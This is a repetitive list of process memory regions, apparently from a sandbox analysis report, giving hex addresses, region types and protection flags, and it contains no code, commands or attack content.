trusted library allocation
page read and write
7FFE7E1F0000
trusted library allocation
page read and write
1E84A74D000
heap
page read and write
196DB718000
trusted library allocation
page read and write
196D807E000
heap
page read and write
1E84DBE0000
trusted library allocation
page read and write
7FFE7E4E0000
trusted library allocation
page read and write
1E84CDA2000
trusted library allocation
page read and write
1E84DCA1000
trusted library allocation
page read and write
124C1000
trusted library allocation
page read and write
1B90F000
unkown
page read and write
196E9DB1000
trusted library allocation
page read and write
1E84E153000
trusted library allocation
page read and write
100C000
heap
page read and write
196EA09C000
trusted library allocation
page read and write
A52B8CC000
stack
page read and write
16D16F85000
heap
page read and write
1C3013C7000
trusted library allocation
page read and write
7FF000
stack
page read and write
82C000
heap
page read and write
CD0000
heap
page read and write
196DB19E000
trusted library allocation
page read and write
196DB31C000
trusted library allocation
page read and write
DA0000
heap
page read and write
1E864746000
heap
page read and write
7FFE7E1FB000
trusted library allocation
page read and write
196DB0B6000
trusted library allocation
page read and write
196DB236000
trusted library allocation
page read and write
7FFE7E202000
trusted library allocation
page read and write
24B0000
heap
page execute and read and write
7DF409F50000
trusted library allocation
page execute and read and write
1E84A6C0000
heap
page read and write
7FFE7E20D000
trusted library allocation
page execute and read and write
7FFE7E3C0000
trusted library allocation
page read and write
7FFE7E2C6000
trusted library allocation
page read and write
7FFE7E3A0000
trusted library allocation
page execute and read and write
15B567E000
stack
page read and write
1D40E000
stack
page read and write
196DA801000
trusted library allocation
page read and write
16D16C4B000
heap
page read and write
16D30F7F000
heap
page read and write
7FFE7E554000
trusted library allocation
page read and write
7FFE7E410000
trusted library allocation
page read and write
1E84C3D5000
trusted library allocation
page read and write
1C379854000
heap
page read and write
1E864B24000
heap
page read and write
7FFE7E2B0000
trusted library allocation
page execute and read and write
196DAD55000
trusted library allocation
page read and write
7FFE7E548000
trusted library allocation
page read and write
7FFE7E39A000
trusted library allocation
page read and write
7FFE7E3F0000
trusted library allocation
page read and write
1AF50000
heap
page execute and read and write
196DB401000
trusted library allocation
page read and write
1E8648A0000
heap
page read and write
1B51D000
stack
page read and write
16D1A55E000
trusted library allocation
page read and write
1E86470A000
heap
page read and write
7FFE7E3D0000
trusted library allocation
page execute and read and write
6B3C0B000
stack
page read and write
196DADE2000
trusted library allocation
page read and write
855000
heap
page read and write
1BADB000
heap
page read and write
15B66CE000
stack
page read and write
1E84C110000
trusted library allocation
page read and write
91F6FFB000
stack
page read and write
7FFE7E3C2000
trusted library allocation
page read and write
7FFE7E390000
trusted library allocation
page read and write
1540000
heap
page read and write
1C30022A000
trusted library allocation
page read and write
7FFE7E3C2000
trusted library allocation
page read and write
12B5000
heap
page read and write
1E84D2D0000
trusted library allocation
page read and write
6B2DBE000
stack
page read and write
196DB5D9000
trusted library allocation
page read and write
1B0ED000
stack
page read and write
196DAD4D000
trusted library allocation
page read and write
1E84D2BF000
trusted library allocation
page read and write
16D30EC0000
heap
page read and write
16D1A57E000
trusted library allocation
page read and write
7FFE7E4B0000
trusted library allocation
page read and write
1210000
heap
page read and write
7FFE7E513000
trusted library allocation
page read and write
A60000
trusted library allocation
page read and write
16D19A6A000
trusted library allocation
page read and write
23EE000
stack
page read and write
7FFE7E542000
trusted library allocation
page read and write
1C310070000
trusted library allocation
page read and write
16D194D1000
trusted library allocation
page read and write
7FFE7E490000
trusted library allocation
page read and write
91F6DFE000
stack
page read and write
7FFE7E29E000
trusted library allocation
page execute and read and write
16D3103C000
heap
page read and write
14B0000
trusted library allocation
page read and write
7FFE7E3F2000
trusted library allocation
page read and write
7FFE7E480000
trusted library allocation
page read and write
7FFE7E670000
trusted library allocation
page read and write
1C379DCB000
heap
page read and write
16D18690000
trusted library allocation
page read and write
1C3102F8000
trusted library allocation
page read and write
16D19B22000
trusted library allocation
page read and write
2BE5000
trusted library allocation
page read and write
7FFE7E202000
trusted library allocation
page read and write
7FFE7E210000
trusted library allocation
page read and write
1E84C579000
trusted library allocation
page read and write
7FFE7E570000
trusted library allocation
page read and write
1C377D90000
heap
page read and write
196DB9CE000
trusted library allocation
page read and write
12358000
trusted library allocation
page read and write
16D19FEB000
trusted library allocation
page read and write
7FFE7E3B0000
trusted library allocation
page execute and read and write
7FFE7E410000
trusted library allocation
page read and write
91F6CF8000
stack
page read and write
16D185E0000
trusted library allocation
page read and write
91F6CFE000
stack
page read and write
1C3011DB000
trusted library allocation
page read and write
12F91000
trusted library allocation
page read and write
7FFE7E454000
trusted library allocation
page read and write
7FFE7E1FD000
trusted library allocation
page execute and read and write
7DF40F6C0000
trusted library allocation
page execute and read and write
7FFE7E296000
trusted library allocation
page read and write
1CACA000
stack
page read and write
196DB934000
trusted library allocation
page read and write
7FFE7E24D000
trusted library allocation
page execute and read and write
1E84E12E000
trusted library allocation
page read and write
7FFE7E440000
trusted library allocation
page read and write
7F0000
heap
page read and write
7FFE7E610000
trusted library allocation
page read and write
15B5C7E000
stack
page read and write
196DB4E6000
trusted library allocation
page read and write
7FFE7E20D000
trusted library allocation
page execute and read and write
7FFE7E4D0000
trusted library allocation
page read and write
1E864800000
heap
page execute and read and write
196DB63B000
trusted library allocation
page read and write
1D0000
heap
page read and write
1E84AAA0000
heap
page read and write
16D30EF0000
heap
page read and write
1BF1D000
stack
page read and write
196DA9AA000
trusted library allocation
page read and write
16D28A4C000
trusted library allocation
page read and write
7FFE7E24B000
trusted library allocation
page execute and read and write
196DAB24000
trusted library allocation
page read and write
1C8D2000
heap
page read and write
16D30BE7000
heap
page read and write
1CE08000
stack
page read and write
196DADB6000
trusted library allocation
page read and write
196DB6FC000
trusted library allocation
page read and write
7FFE7E5DA000
trusted library allocation
page read and write
2351000
trusted library allocation
page read and write
2CBF000
trusted library allocation
page read and write
7FFE7E2C6000
trusted library allocation
page execute and read and write
1E84A6F0000
heap
page read and write
6B2FBE000
stack
page read and write
196D82C0000
heap
page readonly
196DBBD7000
trusted library allocation
page read and write
7FFE7E410000
trusted library allocation
page read and write
A5F000
stack
page read and write
1E84D2C8000
trusted library allocation
page read and write
91F7BCE000
stack
page read and write
1A8DD000
stack
page read and write
1E84D527000
trusted library allocation
page read and write
1E84C170000
heap
page read and write
1BA8E000
stack
page read and write
16D16C5D000
heap
page read and write
16D19FC5000
trusted library allocation
page read and write
196F24E0000
heap
page read and write
16D19821000
trusted library allocation
page read and write
1E85C3BB000
trusted library allocation
page read and write
5B9000
heap
page read and write
7FFE7E510000
trusted library allocation
page read and write
15B5A7B000
stack
page read and write
16D19A07000
trusted library allocation
page read and write
590000
heap
page read and write
560000
heap
page read and write
16D287CF000
trusted library allocation
page read and write
A52A87E000
stack
page read and write
7FFE7E22B000
trusted library allocation
page read and write
7FFE7E560000
trusted library allocation
page read and write
16D311B0000
heap
page read and write
1B5DA000
stack
page read and write
1545000
heap
page read and write
7FFE7E480000
trusted library allocation
page read and write
16D19884000
trusted library allocation
page read and write
19DF000
stack
page read and write
1C300CA5000
trusted library allocation
page read and write
1B8DE000
stack
page read and write
16D194DA000
trusted library allocation
page read and write
1E86470C000
heap
page read and write
1AF90000
heap
page execute and read and write
140F000
stack
page read and write
7FFE7E2B6000
trusted library allocation
page read and write
7FFE7E3D0000
trusted library allocation
page execute and read and write
1E864A47000
heap
page read and write
7FFE7E3C8000
trusted library allocation
page read and write
7FFE7E5FA000
trusted library allocation
page read and write
2BE3000
trusted library allocation
page read and write
7FFE7E56C000
trusted library allocation
page read and write
1E864B28000
heap
page read and write
196DB747000
trusted library allocation
page read and write
196DBB67000
trusted library allocation
page read and write
16D1A583000
trusted library allocation
page read and write
1E84D2CC000
trusted library allocation
page read and write
91F6C77000
stack
page read and write
196EA0A4000
trusted library allocation
page read and write
850000
unkown
page readonly
7FFE7E2E0000
trusted library allocation
page execute and read and write
7FFE7E3D0000
trusted library allocation
page execute and read and write
196F261B000
heap
page read and write
1E864A0D000
heap
page read and write
18B85115000
heap
page read and write
7FFE7E420000
trusted library allocation
page read and write
82F000
heap
page read and write
7FFE7E600000
trusted library allocation
page read and write
7FFE7E2B0000
trusted library allocation
page read and write
16D185C0000
trusted library section
page read and write
12441000
trusted library allocation
page read and write
1A9CD000
stack
page read and write
528000
heap
page read and write
7FFE7E610000
trusted library allocation
page read and write
7FFE7E204000
trusted library allocation
page read and write
A52A97E000
stack
page read and write
7FFE7E23C000
trusted library allocation
page execute and read and write
1C379DA7000
heap
page read and write
7FFE7E490000
trusted library allocation
page read and write
7FFE7E1F3000
trusted library allocation
page execute and read and write
7FFE7E450000
trusted library allocation
page read and write
1C3102F0000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
7FFE7E4F0000
trusted library allocation
page read and write
196DB775000
trusted library allocation
page read and write
196F20F0000
heap
page read and write
2BDD000
trusted library allocation
page read and write
7FFE7E26C000
trusted library allocation
page execute and read and write
196D8240000
heap
page read and write
7FFE7E630000
trusted library allocation
page read and write
196F2159000
heap
page read and write
7FFE7E570000
trusted library allocation
page read and write
196DAB67000
trusted library allocation
page read and write
16D16F80000
heap
page read and write
196DB57F000
trusted library allocation
page read and write
D6C000
heap
page read and write
7FFE7E204000
trusted library allocation
page read and write
7FFE7E450000
trusted library allocation
page read and write
7FFE7E640000
trusted library allocation
page read and write
81F000
heap
page read and write
6B2A7E000
stack
page read and write
16D16BB0000
heap
page read and write
7FFE7E290000
trusted library allocation
page read and write
5B0000
heap
page read and write
2C6A000
trusted library allocation
page read and write
1C3012A7000
trusted library allocation
page read and write
7FFE7E203000
trusted library allocation
page execute and read and write
16D1976A000
trusted library allocation
page read and write
1E84A794000
heap
page read and write
800000
heap
page read and write
1E84D5F3000
trusted library allocation
page read and write
1E864AC1000
heap
page read and write
7FFE7E3C4000
trusted library allocation
page read and write
2CAD000
trusted library allocation
page read and write
E9E000
stack
page read and write
6F5000
heap
page read and write
1AD1E000
stack
page read and write
196E9DD1000
trusted library allocation
page read and write
196D8290000
heap
page read and write
196DB283000
trusted library allocation
page read and write
1E864AF5000
heap
page read and write
7FF413460000
trusted library allocation
page execute and read and write
91F6AF9000
stack
page read and write
1E84C0F0000
trusted library allocation
page read and write
7FFE7E29C000
trusted library allocation
page execute and read and write
61C000
heap
page read and write
16D3104C000
heap
page read and write
244F000
trusted library allocation
page read and write
7FFE7E650000
trusted library allocation
page read and write
196DB054000
trusted library allocation
page read and write
1C3004CD000
trusted library allocation
page read and write
1C37A380000
heap
page read and write
1E84C120000
heap
page readonly
7FFE7E480000
trusted library allocation
page read and write
1BD1E000
stack
page read and write
7FFE7E420000
trusted library allocation
page read and write
1C379D59000
heap
page read and write
7FFE7E3E8000
trusted library allocation
page read and write
1E864A09000
heap
page read and write
7FFE7E1F4000
trusted library allocation
page read and write
7FFE7E2D6000
trusted library allocation
page execute and read and write
1C37A17B000
heap
page read and write
7FFE7E460000
trusted library allocation
page read and write
A52A9F7000
stack
page read and write
1BA74000
heap
page read and write
1E84C180000
trusted library allocation
page read and write
196D82B0000
trusted library allocation
page read and write
7FFE7E1FD000
trusted library allocation
page execute and read and write
511000
stack
page read and write
7FFE7E500000
trusted library allocation
page read and write
7FFE7E2D6000
trusted library allocation
page execute and read and write
7FFE7E560000
trusted library allocation
page read and write
7FFE7E22D000
trusted library allocation
page execute and read and write
6B2D79000
stack
page read and write
7FFE7E539000
trusted library allocation
page read and write
1C379750000
trusted library allocation
page read and write
A52AA7D000
stack
page read and write
91F6A7E000
stack
page read and write
1C379D93000
heap
page read and write
196EA0B4000
trusted library allocation
page read and write
16D30C3D000
heap
page read and write
196F25E5000
heap
page read and write
7DF4822E0000
trusted library allocation
page execute and read and write
A52A51E000
stack
page read and write
18B84DA0000
heap
page read and write
1450000
heap
page read and write
1C37A0A9000
heap
page read and write
1138000
heap
page read and write
7FFE7E400000
trusted library allocation
page execute and read and write
1C3010BF000
trusted library allocation
page read and write
7FFE7E300000
trusted library allocation
page execute and read and write
196D8052000
heap
page read and write
7FFE7E610000
trusted library allocation
page execute and read and write
2C9E000
trusted library allocation
page read and write
7FFE7E3D0000
trusted library allocation
page execute and read and write
1E84D2B7000
trusted library allocation
page read and write
1D10A000
stack
page read and write
1C3018F2000
trusted library allocation
page read and write
16D16BE0000
heap
page read and write
7FFE7E3C4000
trusted library allocation
page read and write
508000
heap
page read and write
51B000
heap
page read and write
4DE3EFE000
unkown
page read and write
1C377E6D000
heap
page read and write
7FFE7E204000
trusted library allocation
page read and write
7FFE7E2C0000
trusted library allocation
page read and write
F90000
trusted library allocation
page read and write
500000
heap
page read and write
1E84A755000
heap
page read and write
7FFE7E224000
trusted library allocation
page read and write
1C377DB0000
heap
page read and write
7FFE7E391000
trusted library allocation
page read and write
7FFE7E25C000
trusted library allocation
page execute and read and write
196D8086000
heap
page read and write
A52A8FA000
stack
page read and write
18B84DB0000
heap
page read and write
16D31032000
heap
page read and write
6B313C000
stack
page read and write
22FE000
stack
page read and write
5C5000
heap
page read and write
1C379E02000
heap
page read and write
7FFE7E510000
trusted library allocation
page read and write
1E84C130000
trusted library allocation
page read and write
16D30FB4000
heap
page read and write
21F0000
heap
page read and write
1C0000
unkown
page readonly
7FFE7E200000
trusted library allocation
page read and write
A52AE7B000
stack
page read and write
53C000
heap
page read and write
7FFE7E430000
trusted library allocation
page read and write
196D8048000
heap
page read and write
7FFE7E24C000
trusted library allocation
page execute and read and write
124C8000
trusted library allocation
page read and write
1510000
heap
page execute and read and write
196F2654000
heap
page read and write
1C379D10000
heap
page read and write
1E84A6D0000
heap
page read and write
1C379720000
trusted library allocation
page read and write
16D18988000
trusted library allocation
page read and write
2441000
trusted library allocation
page read and write
7FFE7E630000
trusted library allocation
page execute and read and write
1C377E38000
heap
page read and write
7FFE7E590000
trusted library allocation
page read and write
7FFE7E650000
trusted library allocation
page read and write
7FFE7E22D000
trusted library allocation
page execute and read and write
7FFE7E310000
trusted library allocation
page execute and read and write
1E864980000
heap
page execute and read and write
3D0000
heap
page read and write
D8B000
heap
page read and write
1118000
heap
page read and write
196D9C10000
heap
page read and write
16D187E7000
trusted library allocation
page read and write
16D28A66000
trusted library allocation
page read and write
1E864A11000
heap
page read and write
53A000
heap
page read and write
1B980000
heap
page read and write
7FFE7E470000
trusted library allocation
page read and write
7FFE7E510000
trusted library allocation
page read and write
7FFE7E460000
trusted library allocation
page read and write
7FFE7E660000
trusted library allocation
page read and write
196D9E36000
trusted library allocation
page read and write
7FFE7E470000
trusted library allocation
page read and write
1C301783000
trusted library allocation
page read and write
7FFE7E2DC000
trusted library allocation
page execute and read and write
7FFE7E548000
trusted library allocation
page read and write
196DB60A000
trusted library allocation
page read and write
7FFE7E1ED000
trusted library allocation
page execute and read and write
A52BACC000
stack
page read and write
1C301DDD000
trusted library allocation
page read and write
1C8C0000
heap
page read and write
570000
heap
page read and write
16D1A04E000
trusted library allocation
page read and write
1B25E000
stack
page read and write
1D20E000
stack
page read and write
7FFE7E3A0000
trusted library allocation
page execute and read and write
7FFE7E290000
trusted library allocation
page read and write
7FFE7E21B000
trusted library allocation
page read and write
7FFE7E2D0000
trusted library allocation
page read and write
196D8079000
heap
page read and write
1C300BFF000
trusted library allocation
page read and write
196DBB8D000
trusted library allocation
page read and write
1C377F27000
heap
page read and write
7D0000
heap
page read and write
7FFE7E60C000
trusted library allocation
page read and write
1E864C50000
heap
page read and write
1E84A759000
heap
page read and write
1C379D9F000
heap
page read and write
1C377E42000
heap
page read and write
AAF000
stack
page read and write
6B2EBA000
stack
page read and write
7FFE7E2BC000
trusted library allocation
page execute and read and write
2B5E000
stack
page read and write
196D808C000
heap
page read and write
196F24E2000
heap
page read and write
196D8000000
heap
page read and write
196DAED1000
trusted library allocation
page read and write
7FFE7E3E0000
trusted library allocation
page execute and read and write
16D197F9000
trusted library allocation
page read and write
7FFE7E20D000
trusted library allocation
page execute and read and write
24C1000
trusted library allocation
page read and write
2C70000
trusted library allocation
page read and write
196DAF88000
trusted library allocation
page read and write
91F7B4C000
stack
page read and write
1AECF000
stack
page read and write
1B7DE000
stack
page read and write
196F24D0000
heap
page read and write
196DB533000
trusted library allocation
page read and write
7FFE7E690000
trusted library allocation
page read and write
7F8000
heap
page read and write
1C310031000
trusted library allocation
page read and write
7FFE7E39A000
trusted library allocation
page read and write
1C301E22000
trusted library allocation
page read and write
7FFE7E4A0000
trusted library allocation
page read and write
196F2639000
heap
page read and write
7FFE7E640000
trusted library allocation
page read and write
1C377CB0000
heap
page read and write
7FFE7E210000
trusted library allocation
page read and write
196DB6A2000
trusted library allocation
page read and write
196DB173000
trusted library allocation
page read and write
7FFE7E1ED000
trusted library allocation
page execute and read and write
1E84DB7A000
trusted library allocation
page read and write
2340000
heap
page execute and read and write
196F2601000
heap
page read and write
7FFE7E305000
trusted library allocation
page execute and read and write
196EA095000
trusted library allocation
page read and write
DCD000
heap
page read and write
16D30FF9000
heap
page read and write
7FFE7E20D000
trusted library allocation
page execute and read and write
16D19973000
trusted library allocation
page read and write
196D8040000
heap
page read and write
7FFE7E3E0000
trusted library allocation
page read and write
16D16C3C000
heap
page read and write
1C379EF6000
heap
page execute and read and write
7FFE7E23C000
trusted library allocation
page execute and read and write
2C42000
trusted library allocation
page read and write
7FFE7E214000
trusted library allocation
page read and write
1B4D3000
heap
page read and write
7FFE7E232000
trusted library allocation
page read and write
D10000
heap
page read and write
A52ACFF000
stack
page read and write
7FFE7E430000
trusted library allocation
page read and write
1C379EF0000
heap
page execute and read and write
1B05E000
stack
page read and write
7FFE7E3F4000
trusted library allocation
page read and write
2F9D000
trusted library allocation
page read and write
1E84C160000
heap
page execute and read and write
15B5879000
stack
page read and write
1C379840000
heap
page read and write
7FFE7E603000
trusted library allocation
page read and write
7DF43E420000
trusted library allocation
page execute and read and write
568000
heap
page read and write
7FFE7E5E0000
trusted library allocation
page read and write
7FFE7E1F3000
trusted library allocation
page execute and read and write
7FFE7E202000
trusted library allocation
page read and write
1240000
heap
page execute and read and write
7FFE7E220000
trusted library allocation
page read and write
7FFE7E640000
trusted library allocation
page read and write
645000
heap
page read and write
11C9000
heap
page read and write
16D18761000
trusted library allocation
page read and write
6B2C77000
stack
page read and write
1E84C81D000
trusted library allocation
page read and write
1B09E000
stack
page read and write
1C8D0000
heap
page read and write
15B59F7000
stack
page read and write
91F6B7D000
stack
page read and write
1E864807000
heap
page execute and read and write
196EA09A000
trusted library allocation
page read and write
7FFE7E224000
trusted library allocation
page read and write
196F21CE000
heap
page read and write
7FFE7E560000
trusted library allocation
page read and write
196DB369000
trusted library allocation
page read and write
B95000
heap
page read and write
1E84D0CE000
trusted library allocation
page read and write
1C379700000
trusted library allocation
page read and write
1E8649BC000
heap
page read and write
9F0000
heap
page read and write
7FFE7E460000
trusted library allocation
page read and write
12B61000
trusted library allocation
page read and write
7FFE7E340000
trusted library allocation
page execute and read and write
7FFE7E310000
trusted library allocation
page execute and read and write
196D809C000
heap
page read and write
7FFE7E24C000
trusted library allocation
page execute and read and write
1E84D70F000
trusted library allocation
page read and write
7FFE7E54C000
trusted library allocation
page read and write
1ADC0000
heap
page execute and read and write
7FFE7E1E0000
trusted library allocation
page read and write
91F7A4A000
stack
page read and write
1C301950000
trusted library allocation
page read and write
16D28A4E000
trusted library allocation
page read and write
7FFE7E2D6000
trusted library allocation
page execute and read and write
15B694E000
stack
page read and write
616000
heap
page read and write
7FFE7E534000
trusted library allocation
page read and write
1AA4D000
stack
page read and write
7FFE7E2C6000
trusted library allocation
page execute and read and write
1C301214000
trusted library allocation
page read and write
1E864AF8000
heap
page read and write
24CC000
trusted library allocation
page read and write
1E8646E0000
heap
page read and write
1E864A21000
heap
page read and write
7FFE7E220000
trusted library allocation
page read and write
7FFE7E1F3000
trusted library allocation
page execute and read and write
91F6BF9000
stack
page read and write
1E864B34000
heap
page read and write
7FFE7E460000
trusted library allocation
page read and write
1E864780000
heap
page read and write
1C01D000
stack
page read and write
7FFE7E560000
trusted library allocation
page read and write
1C379845000
heap
page read and write
1E85C634000
trusted library allocation
page read and write
7FFE7E306000
trusted library allocation
page execute and read and write
196D8395000
heap
page read and write
91F697E000
stack
page read and write
1E85C63B000
trusted library allocation
page read and write
7FFE7E1FD000
trusted library allocation
page execute and read and write
895000
heap
page read and write
2451000
trusted library allocation
page read and write
A52BB4B000
stack
page read and write
196D808A000
heap
page read and write
650000
heap
page read and write
196D9D50000
heap
page execute and read and write
6F1000
stack
page read and write
7FFE7E27C000
trusted library allocation
page execute and read and write
15B53BE000
stack
page read and write
1C37A178000
heap
page read and write
930000
trusted library allocation
page read and write
1490000
trusted library allocation
page read and write
1B9E0000
heap
page read and write
8A5000
heap
page read and write
7FFE7E234000
trusted library allocation
page read and write
7FFE7E600000
trusted library allocation
page execute and read and write
1C1B5000
stack
page read and write
16D30C30000
heap
page read and write
1C37A037000
heap
page read and write
7FFE7E200000
trusted library allocation
page read and write
6B303E000
stack
page read and write
7FFE7E23D000
trusted library allocation
page execute and read and write
1C377E00000
heap
page read and write
235F000
trusted library allocation
page read and write
15B5CFC000
stack
page read and write
15B67CE000
stack
page read and write
7FFE7E550000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
2170000
heap
page read and write
6B3C89000
stack
page read and write
1E84A76D000
heap
page read and write
16D16C43000
heap
page read and write
2CBB000
trusted library allocation
page read and write
196DB644000
trusted library allocation
page read and write
7FFE7E637000
trusted library allocation
page read and write
7FFE7E23D000
trusted library allocation
page execute and read and write
16D191B3000
trusted library allocation
page read and write
1D30C000
stack
page read and write
7FFE7E223000
trusted library allocation
page execute and read and write
8A0000
heap
page read and write
16D1993A000
trusted library allocation
page read and write
7FFE7E400000
trusted library allocation
page read and write
15B56FF000
stack
page read and write
7FFE7E21D000
trusted library allocation
page execute and read and write
1E8646F2000
heap
page read and write
There are 1142 hidden memdumps, click here to show them.